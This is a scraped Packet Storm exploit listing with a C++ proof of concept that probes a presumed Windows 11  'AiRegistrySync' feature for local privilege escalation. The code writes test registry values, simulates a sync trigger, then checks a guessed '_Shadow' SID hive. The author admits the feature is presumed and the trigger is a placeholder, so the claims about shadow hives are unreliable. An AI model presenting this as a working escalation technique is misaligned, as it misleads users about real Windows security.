{“lastseen”:”2026-01-30T17:50:00″,”description”:”Proof of concept exploit designed to test a potential local privilege escalation vulnerability in Windows, specifically targeting a feature called AiRegistrySync. It checks if modifications made by a standard user in their own Registry profile can be…”,”published”:”2026-01-30T00:00:00″,”modified”:”2026-01-30T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows 11 build 10.0.27898.1000 Local Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:214612″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Microsoft Windows 11 build 10.0.27898.1000 AiRegistrySync Shadow Hive Propagation Test Local Privilege Escalation |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : System built\u2011in component. No standalone download available. |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212253\/\\n \\n [+] Summary : This C++ code is a Proof of Concept (PoC) designed to test a potential Local Privilege Escalation (LPE) vulnerability in Windows, \\n specifically targeting a presumed feature called AiRegistrySync.\\n To check if modifications made by a standard user in their own Registry profile can be automatically synchronized (propagated) \\n \\t\\t\\t into the protected \\”Shadow Hive\\” registry key associated with high-privilege user accounts (like administrators).\\n \\n [+] Method:\\n \\n It retrieves the Security Identifier (SID) of the current user.\\n \\n It constructs a path for the presumed Shadow SID (e.g., adding _Shadow to the standard SID).\\n \\n It creates a test key and values (PoC_DWORD, PoC_STRING) within the current user’s accessible Registry path (HKEY_USERS\\\\[User_SID]\\\\Keyboard Layout\\\\TestVuln).\\n \\n It simulates the triggering of the AiRegistrySync process.\\n \\n It waits for 15 seconds.\\n \\n It attempts to read the created test values from the highly protected Shadow Hive path.\\n \\n Success indicates that the synchronization mechanism might be flawed, allowing a lower-privileged user to inject data into a privileged hive, a critical step towards achieving LPE.\\n \\n [+] Note \\n \\n The test itself is based on genuine security research concepts, but the function to actually start the AiRegistrySync service (TriggerAiRegistrySyncManual) is currently a placeholder\/simulation within this specific code.\\n \\n \\n [+] POC : \\n \\n \\n #include \\u003cwindows.h\\u003e\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cstring\\u003e\\n #include \\u003cvector\\u003e\\n #include \\u003csddl.h\\u003e\\n \\n #pragma comment(lib, \\”advapi32.lib\\”)\\n \\n \/\/ ===============================================================\\n \/\/ RAII CLASS \u2013 Safe Registry Handle\\n \/\/ ===============================================================\\n class ScopedRegKey {\\n private:\\n HKEY hKey = nullptr;\\n public:\\n ScopedRegKey() {}\\n ~ScopedRegKey() {\\n if (hKey) RegCloseKey(hKey);\\n }\\n HKEY* ptr() { return \\u0026hKey; }\\n HKEY get() const { return hKey; }\\n operator bool() const { return hKey != nullptr; }\\n };\\n \\n \/\/ ===============================================================\\n \/\/ Helper: Convert SID string to readable form\\n \/\/ ===============================================================\\n bool GetCurrentUserSid(std::wstring\\u0026 sidString) {\\n HANDLE token;\\n if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, \\u0026token))\\n return false;\\n \\n DWORD size = 0;\\n GetTokenInformation(token, TokenUser, NULL, 0, \\u0026size);\\n std::vector\\u003cBYTE\\u003e buffer(size);\\n \\n if (!GetTokenInformation(token, TokenUser, \\u0026buffer[0], size, \\u0026size)) {\\n CloseHandle(token);\\n return false;\\n }\\n \\n CloseHandle(token);\\n \\n PTOKEN_USER user = (PTOKEN_USER)\\u0026buffer[0];\\n LPWSTR stringSid = nullptr;\\n \\n if (!ConvertSidToStringSidW(user-\\u003eUser.Sid, \\u0026stringSid))\\n return false;\\n \\n sidString = stringSid;\\n LocalFree(stringSid);\\n return true;\\n }\\n \\n \/\/ ===============================================================\\n \/\/ Wait for AI Registry Sync with logs every 5 seconds\\n \/\/ ===============================================================\\n void WaitForSync(DWORD milliseconds) {\\n printf(\\”[*] Waiting %lu ms for AiRegistrySync…\\\\n\\”, milliseconds);\\n \\n DWORD interval = 1000;\\n DWORD elapsed = 0;\\n \\n while (elapsed \\u003c milliseconds) {\\n DWORD waitTime = min(interval, milliseconds – elapsed);\\n Sleep(waitTime);\\n elapsed += waitTime;\\n \\n if (elapsed % 5000 == 0) {\\n printf(\\”[*] Still waiting… (%lu ms elapsed)\\\\n\\”, elapsed);\\n }\\n }\\n }\\n \\n \/\/ ===============================================================\\n \/\/ Create test key + write values\\n \/\/ ===============================================================\\n bool CreateKeyboardLayoutKey(const std::wstring\\u0026 userSid) {\\n std::wstring keyPath = userSid + L\\”\\\\\\\\Keyboard Layout\\\\\\\\TestVuln\\”;\\n \\n HKEY hKey = nullptr;\\n LSTATUS st = RegCreateKeyExW(\\n HKEY_USERS,\\n keyPath.c_str(),\\n 0,\\n nullptr,\\n 0,\\n KEY_ALL_ACCESS,\\n nullptr,\\n \\u0026hKey,\\n nullptr\\n );\\n \\n if (st != ERROR_SUCCESS) {\\n printf(\\”[!] Failed creating user test key (error: %ld)\\\\n\\”, st);\\n return false;\\n }\\n \\n DWORD dw = 1337;\\n RegSetValueExW(hKey, L\\”PoC_DWORD\\”, 0, REG_DWORD, (BYTE*)\\u0026dw, sizeof(dw));\\n \\n const wchar_t* txt = L\\”ShadowPropagationTest\\”;\\n RegSetValueExW(hKey, L\\”PoC_STRING\\”, 0, REG_SZ,\\n (BYTE*)txt,\\n (DWORD)((wcslen(txt) + 1) * sizeof(wchar_t)));\\n \\n RegCloseKey(hKey);\\n return true;\\n }\\n \\n \/\/ ===============================================================\\n \/\/ Dummy AiRegistrySync \u2013 simulation (Replace if real trigger exists)\\n \/\/ ===============================================================\\n bool TriggerAiRegistrySyncManual() {\\n printf(\\”[*] (Simulated) Triggering AiRegistrySync…\\\\n\\”);\\n return true;\\n }\\n \\n \/\/ ===============================================================\\n \/\/ Detect shadow SID\\n \/\/ Windows duplicates high-privilege users like admin into shadow hives\\n \/\/ ===============================================================\\n bool FindShadowSid(const std::wstring\\u0026 userSid, std::wstring\\u0026 shadowSid) {\\n \/\/ Typical pattern:\\n \/\/ User SID: S-1-5-21-xxx-xxx-xxx-1001\\n \/\/ Shadow SID: S-1-5-21-xxx-xxx-xxx-1001_Shadow\\n \\n shadowSid = userSid + L\\”_Shadow\\”;\\n return true;\\n }\\n \\n \/\/ ===============================================================\\n \/\/ Check if shadow hive contains the expected propagation\\n \/\/ ===============================================================\\n bool CheckShadowCopy(const std::wstring\\u0026 shadowSid) {\\n std::wstring shadowPath = shadowSid + L\\”\\\\\\\\Keyboard Layout\\\\\\\\TestVuln\\”;\\n \\n ScopedRegKey shadowKey;\\n LSTATUS st = RegOpenKeyExW(\\n HKEY_USERS,\\n shadowPath.c_str(),\\n 0,\\n KEY_READ,\\n shadowKey.ptr()\\n );\\n \\n if (st != ERROR_SUCCESS) {\\n printf(\\”[!] Shadow hive key not found. Propagation FAILED.\\\\n\\”);\\n return false;\\n }\\n \\n printf(\\”[+] Shadow hive key found! Propagation SUCCESS.\\\\n\\”);\\n \\n DWORD dw = 0;\\n DWORD sz = sizeof(dw);\\n if (RegQueryValueExW(shadowKey.get(), L\\”PoC_DWORD\\”, nullptr, nullptr,\\n (BYTE*)\\u0026dw, \\u0026sz) == ERROR_SUCCESS) {\\n printf(\\”[+] Shadow DWORD value = %lu\\\\n\\”, dw);\\n }\\n \\n wchar_t buf[260];\\n DWORD size = sizeof(buf);\\n if (RegQueryValueExW(shadowKey.get(), L\\”PoC_STRING\\”, nullptr, nullptr,\\n (BYTE*)buf, \\u0026size) == ERROR_SUCCESS) {\\n printf(\\”[+] Shadow STRING value = %ls\\\\n\\”, buf);\\n }\\n \\n return true;\\n }\\n \\n \/\/ ===============================================================\\n \/\/ Cleanup: Remove keys from user + shadow hives\\n \/\/ ===============================================================\\n void CleanupKeys(const std::wstring\\u0026 userSid, const std::wstring\\u0026 shadowSid) {\\n std::wstring p1 = userSid + L\\”\\\\\\\\Keyboard Layout\\\\\\\\TestVuln\\”;\\n std::wstring p2 = shadowSid + L\\”\\\\\\\\Keyboard Layout\\\\\\\\TestVuln\\”;\\n \\n RegDeleteTreeW(HKEY_USERS, p1.c_str());\\n RegDeleteTreeW(HKEY_USERS, p2.c_str());\\n \\n printf(\\”[*] Cleanup complete.\\\\n\\”);\\n }\\n \\n \/\/ ===============================================================\\n \/\/ Main Test Procedure\\n \/\/ ===============================================================\\n bool TestVulnerability() {\\n printf(\\”\\\\n============================================\\\\n\\”);\\n printf(\\” WINDOWS AiRegistrySync SHADOW HIVE TEST\\\\n\\”);\\n printf(\\” Final Stable Advanced Edition \u2013 Indoushka\\\\n\\”);\\n printf(\\”============================================\\\\n\\\\n\\”);\\n \\n std::wstring userSid, shadowSid;\\n \\n if (!GetCurrentUserSid(userSid)) {\\n printf(\\”[!] Could not get current user SID.\\\\n\\”);\\n return false;\\n }\\n \\n printf(\\”[*] Current User SID: %ws\\\\n\\”, userSid.c_str());\\n \\n if (!FindShadowSid(userSid, shadowSid)) {\\n printf(\\”[!] Failed to detect shadow SID.\\\\n\\”);\\n return false;\\n }\\n \\n printf(\\”[*] Shadow Hive SID: %ws\\\\n\\”, shadowSid.c_str());\\n \\n \/\/ Step 1 \u2013 Create test key\\n printf(\\”\\\\n[*] Step 1: Creating test key\\\\n\\”);\\n if (!CreateKeyboardLayoutKey(userSid)) {\\n printf(\\”[!] Failed creating test key.\\\\n\\”);\\n return false;\\n }\\n \\n \/\/ Step 2 \u2013 Trigger Sync\\n printf(\\”\\\\n[*] Step 2: Triggering AiRegistrySync\\\\n\\”);\\n TriggerAiRegistrySyncManual();\\n \\n \/\/ Step 3 \u2013 Wait\\n printf(\\”\\\\n[*] Step 3: Waiting for sync…\\\\n\\”);\\n WaitForSync(15000);\\n \\n \/\/ Step 4 \u2013 Check Shadow Copy\\n printf(\\”\\\\n[*] Step 4: Checking shadow hive\\\\n\\”);\\n bool ok = CheckShadowCopy(shadowSid);\\n \\n \/\/ Step 5 \u2013 Cleanup\\n printf(\\”\\\\n[*] Step 5: Cleanup\\\\n\\”);\\n CleanupKeys(userSid, shadowSid);\\n \\n return ok;\\n }\\n \\n \/\/ ===============================================================\\n \/\/ main()\\n \/\/ ===============================================================\\n int main() {\\n TestVulnerability();\\n return 0;\\n }\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214612″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214612\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-30T17:50:00″,”description”:”Proof of concept exploit designed to test a potential local privilege escalation vulnerability in Windows, specifically targeting a feature called AiRegistrySync. It checks if modifications…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-38348","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n